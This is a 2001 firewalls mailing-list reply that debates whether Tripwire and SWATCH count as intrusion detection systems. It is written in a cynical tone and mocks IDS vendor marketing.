Tripwire - can be considered a host-based Intrusion Detection but more an file system integrity checker - since in order to fine tune TripWire to it's best of it's ability, is that one must be establish a "Golden" OS copy of the particular operating system in place. In most cases, this is not available, since the operating system was up and running before someone purchased or downloaded a copy of TripWire. After establishing a baseline tripwire security policy, one has to be saavy enough to tweak all the alerts that TripWire can generate, which is very very time consuming. SWATCH is primitive form of a door knob rattling device, very similiar to those $49.95 door alarms one uses on hotel/motel doors to make one sleep better at night. It isn't that sophisticated but makes a lot of noise when the door is strongly fiddled with. BTW, The door knob alarm does not chirp when the hotel/motel door is directly hit on the center of the door knob with a medium-sized sledge hammeror very strong straight leg kick.. Check the back of the door knob alarm for what the limitations are. Defining Intrusion Detection has an been ongoing marketing banter Pattern Matching versus Packet dis-assembly/re-assembly, our IDS is faster than your IDS. We detect more, they are going from consumer to corporate, etc, yada, yada. Marketing people also sacrifice their young or coyote ugly arm if they can prove that they successfully doubled their products market share against their competition each time a new marketing campaign is released. One of the major reasons for picking a reasnable IDS system is making a firewall administrator/network engineer more aware that the firewall policy/router configuration is not doing it's job correctly or is incapable of alerting a network administrator that a duplicate IP address has been observed or a block of IP addresses that shouldn't be active is, etc, etc. The technology has always been there, but the number of people actually having a "CLUE" has dwindled over the last year or two Trip, Crash.. fumble.. (sorry fell off my IDS cynic soapbox.. ;;) At 01:14 PM 3/7/01 -0500, Ken Seefried wrote: I will merely respond that if the definition of an Intrusion Detection System is "a system that is designed to detect an intrusion", then I personally am comfortable calling tripwire and swatch simple forms of IDS. Gratuitously rewriting the definition of what an IDS is, merely because the technology now offers extended possibilities, is a job best left to a vendor marketing department. As always, individual opinions may vary. Ken - [To unsubscribe, send mail to [EMAIL PROTECTED] with "unsubscribe firewalls" in the body of the message.]
